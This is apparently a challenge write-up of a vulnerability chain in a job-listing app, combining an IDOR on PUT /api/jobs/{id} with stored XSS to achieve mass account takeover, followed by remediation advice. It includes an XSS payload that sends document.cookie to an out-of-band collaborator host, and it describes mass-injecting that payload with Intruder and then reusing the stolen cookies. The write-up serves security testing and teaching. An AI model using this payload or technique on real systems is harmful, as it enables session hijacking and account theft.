Hi! In my spare time, I've been participating in the Helium Challenge Batch 2 event organized by Cyber Academy, and in this article I'd like to share one of the insights I gained while taking part in the event :)
Summary
A critical vulnerability chain was identified in the application combining Insecure Direct Object Reference (IDOR) and Stored Cross-Site Scripting (XSS), which can be exploited to achieve mass account takeover.
The /api/jobs/{id} endpoint does not enforce proper authorization checks, allowing attackers to modify job postings belonging to other users by manipulating the job identifier. Additionally, multiple input fields are vulnerable to Stored XSS, enabling attackers to inject malicious JavaScript that is executed in victims' browsers.
By chaining these vulnerabilities, an attacker can inject persistent XSS payloads into arbitrary job postings, resulting in large-scale session hijacking.
Affected Application
Vulnerability Details
Insecure Direct Object Reference (IDOR)
The application fails to validate whether the authenticated user is authorized to modify a specific job resource.
Vulnerable Endpoint:
PUT /api/jobs/{id}An attacker can modify any job posting by changing the {id} parameter, leading to unauthorized access and modification of other users' data.
Stored Cross-Site Scripting (XSS)
The following fields are vulnerable to persistent XSS:
title
description
requirementsUser input is not properly sanitized or encoded before being stored and rendered, allowing malicious JavaScript execution.
Vulnerability Chaining
By combining IDOR and Stored XSS:
1. Attacker enumerates job IDs
2. Modifies other users' job postings via IDOR
3. Injects persistent XSS payloads
4. Victims view the job details page
5. Malicious JavaScript executes in victims' browsers
6. Session cookies are exfiltrated and Account takeoverAttack Scenario
An attacker can:
1. Enumerate job IDs via available API endpoints
2. Use IDOR to overwrite job postings owned by other users
3. Inject a malicious XSS payload into multiple job entries
4. Wait for victims to view the job listings
5. When victims access the manipulated job details page, their session cookies are automatically exfiltrated, allowing the attacker to hijack their accounts.
Steps to Reproduce
For this test, I used both of my accounts with different roles: "Job Seeker" and "Company."
The Job Listings page shows that 26 job openings have been found.
The tester then used the Company account to create a post related to a job opening.
After that, the tester edited the post they had created earlier. And before clicking "Post Job," the tester enabled the intercept feature in the Helium Core tool.
Here is the request generated by the post job editing process. As you can see here, the tester received a single endpoint:
PUT /api/jobs/39where 39 is the tester's post number.
Then, during the reconnaissance phase, the tester discovered an endpoint that allowed them to view another user's post ID by accessing the following endpoint:
GET /api/jobs/11
Next, in the PUT request, the tester changes the tester's ID to another user's ID:
PUT /api/jobs/39 > PUT /api/jobs/11
The results show that the tester was able to modify another user's job post.
Next, the tester again found that all three parameters in the POST update contained an XSS vulnerability:
title
description
requirementsPayload XSS:
<img src=x onx=() onerror=alert('title')>
<img src=x onx=() onerror=alert('description')>
<img src=x onx=() onerror=alert('requirements')>
And as a result, when the tester views their own job posting page directly, the XSS payload is executed, and this also affects other users who access the tester's post.
Job Seeker account
To exploit this vulnerability, the tester will use an XSS payload that can be used to steal the victim's cookies.
Payload XSS stealing cookie:
<img src=x onerror=this.src='http://XXXXXX.oastify.com/?c='+document.cookie>To carry out this attack, the tester will use the BurpSuite tool and its "Intruder" feature, which allows the tester to directly launch attacks against all of another user's Post Jobs.
The tester used the BurpSuite Collaborator feature and observed that one of the users in the Collaborator was affected by this attack, and the tester obtained the victim's cookie.
Replace the tester's cookies with the victim's by editing the cookies using the Developer Tools.
And can edit profile victim.
Impact
This vulnerability chain significantly increases risk due to the combination of access control bypass and persistent client-side code execution.
Unauthorized Access (IDOR)
- Modify job postings of other users
- Authorization bypass
Stored XSS (Persistent)
- Payload executed on every view
- Affects multiple users
Mass Account Takeover
- Session hijacking via cookie exfiltration
- Scalable attack affecting many users
Recommendations
IDOR (Authorization Check)
Ensure users can only access their own resources:
if (job.owner_id != current_user.id):
return 403 ForbiddenInput Validation & Output Encoding
- Sanitize all user input
- Escape dangerous characters:
< > " ' & / - Apply proper output encoding when rendering
Use Sanitization Libraries
- Frontend: DOMPurify
- Backend: OWASP Java HTML Sanitizer
Implement Content Security Policy (CSP)
Content-Security-Policy: default-src 'self'; script-src 'self';Secure Session Cookies
- Set
HttpOnlyflag - Set
Secureflag - Use
SameSiteattribute
References
Lesson learned
A critical vulnerability chain combining IDOR and Stored XSS was identified, allowing attackers to modify other users' job postings and inject persistent malicious scripts.
This enables large-scale exploitation where victims unknowingly execute attacker-controlled JavaScript upon viewing job details. As a result, session cookies can be exfiltrated, leading to mass account takeover.
The issue is easily exploitable and affects multiple users, significantly increasing overall risk to the platform.